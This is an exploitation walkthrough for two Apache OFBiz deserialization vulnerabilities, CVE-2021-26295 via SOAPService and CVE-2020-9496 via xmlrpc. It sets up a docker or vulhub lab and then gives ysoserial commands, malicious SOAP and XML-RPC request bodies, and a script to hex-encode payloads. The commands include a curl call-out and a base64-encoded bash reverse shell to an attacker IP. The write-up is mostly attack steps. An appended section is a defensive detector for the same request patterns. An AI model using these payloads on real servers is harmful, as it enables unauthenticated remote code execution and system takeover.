OFBiz is a Java-based web framework that includes an entity engine, a service engine and a widget-based UI. It is an e-commerce platform used to build large and medium-sized enterprise-grade, cross-platform, cross-database, cross-application-server, multi-tier, distributed e-commerce application systems.
CVE-2021-26295: RMI deserialization command execution; an unauthenticated attacker can successfully take over Apache OFBiz.
CVE-2020-9496: unauthenticated deserialization via xmlrpc leading to RCE.
Affected versions:
CVE-2021-26295: Apache OFBiz < 17.12.06
CVE-2020-9496: Apache OFBiz < 17.12.04
app="Apache_OFBiz"
CVE-2021-26295
docker run -d -p 8000:8080 -p 8443:8443 opensourceknight/ofbiz
POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body>
    <ser>
      <map-HashMap>
        <map-Entry>
          <map-Key>
            <cus-obj>ace......e78</cus-obj>
          </map-Key>
          <map-Value>
            <std-String value="http://xxxxxx.dnslog.cn"/>
          </map-Value>
        </map-Entry>
      </map-HashMap>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>
For the cus-obj value in the middle, generate it directly with:
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar URLDNS http://ofbiztest.xxxxxx.dnslog.cn > ofbizhex.out
Then convert the output to hex:

import binascii

# Read the raw bytes written by the command above and print them as a hex string
filename = 'ofbizhex.out'
with open(filename, 'rb') as f:
    content = f.read()
print(binascii.hexlify(content).decode())
RCE
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME 'curl http://192.168.56.200:7766/testofbizrce' > b2h10.txt
POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
  <soapenv:Header/>
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key>
            <cus-obj>aced00057......00678</cus-obj>
          </map-Key>
          <map-Value>
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>
Reverse shell
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar ROME 'bash -c {echo,YmFzaCAtYyAnZXhlYyBiYXNoIC1pICY+L2Rldi90Y3AvMTkyLjE2OC41Ni4yMDAvNzc2NiA8JjEn}|{base64,-d}|{bash,-i}' > b2h11.txt
POST /webtools/control/SOAPService HTTP/1.1
......
Content-Type: application/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
  <soapenv:Header/>
  <soapenv:Body>
    <ser>
      <map-Map>
        <map-Entry>
          <map-Key>
            <cus-obj>aced00057......000678</cus-obj>
          </map-Key>
          <map-Value>
            <std-String/>
          </map-Value>
        </map-Entry>
      </map-Map>
    </ser>
  </soapenv:Body>
</soapenv:Envelope>
CVE-2020-9496
Environment: https://vulhub.org/#/environments/ofbiz/CVE-2020-9496/
https://192.168.56.200:8443/myportal/control/main
https://192.168.56.200:8443/webtools/control/xmlrpc
java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all-brianwrf-fork.jar CommonsBeanutils1 "touch /tmp/success" | base64 | tr -d "\n"
POST /webtools/control/xmlrpc HTTP/1.1
......
Content-Type: application/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>ProjectDiscovery</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">rO0......A14</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
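Added example (not part of the original writeup): a defender-side check that flags requests to either endpoint above whose body wraps a Java serialization stream in the elements these two requests use, <cus-obj> for SOAPService and the xmlrpc extensions <serializable>. The request bodies below are constructed samples; the object bytes are only the serialization header plus filler, and the log format is assumed.

```python
import re
from typing import Optional

# Endpoints from the two requests above.
SOAP_PATH = "/webtools/control/SOAPService"
XMLRPC_PATH = "/webtools/control/xmlrpc"

# A Java serialization stream starts with 0xACED0005: "aced0005" when hex-encoded
# inside <cus-obj>, "rO0AB" when base64-encoded inside <serializable>.
CUS_OBJ_RE = re.compile(r"<cus-obj>\s*(aced0005[0-9a-f]*)", re.IGNORECASE)
SERIALIZABLE_RE = re.compile(
    r'<serializable\s+xmlns="http://ws\.apache\.org/xmlrpc/namespaces/extensions">'
    r"\s*(rO0AB[A-Za-z0-9+/=]*)"
)


def classify_request(path: str, body: str) -> Optional[str]:
    """Return a finding label for one request, or None if no embedded object is seen."""
    if path == SOAP_PATH and CUS_OBJ_RE.search(body):
        return "CVE-2021-26295 pattern: serialized Java object in SOAPService <cus-obj>"
    if path == XMLRPC_PATH and SERIALIZABLE_RE.search(body):
        return "CVE-2020-9496 pattern: serialized Java object in xmlrpc <serializable>"
    return None


# Constructed sample requests (path, body); no real gadget chain is embedded.
SAMPLES = [
    (SOAP_PATH, "<soapenv:Envelope><soapenv:Body><ser><map-Map><map-Entry>"
                "<map-Key><cus-obj>aced00050000</cus-obj></map-Key>"
                "<map-Value><std-String/></map-Value></map-Entry></map-Map></ser>"
                "</soapenv:Body></soapenv:Envelope>"),
    (XMLRPC_PATH, '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
                  "<params><param><value><struct><member><name>test</name><value>"
                  '<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">'
                  "rO0ABXNyAA==</serializable></value></member></struct></value></param>"
                  "</params></methodCall>"),
    # Benign xmlrpc call with a plain string parameter: must not be flagged.
    (XMLRPC_PATH, '<?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName>'
                  "<params><param><value><string>hello</string></value></param></params>"
                  "</methodCall>"),
]


def scan(samples=SAMPLES):
    """Classify every sample; returns one label (or None) per request in order."""
    return [classify_request(path, body) for path, body in samples]


if __name__ == "__main__":
    for (path, _), finding in zip(SAMPLES, scan()):
        print(path, "->", finding or "no serialized object")
```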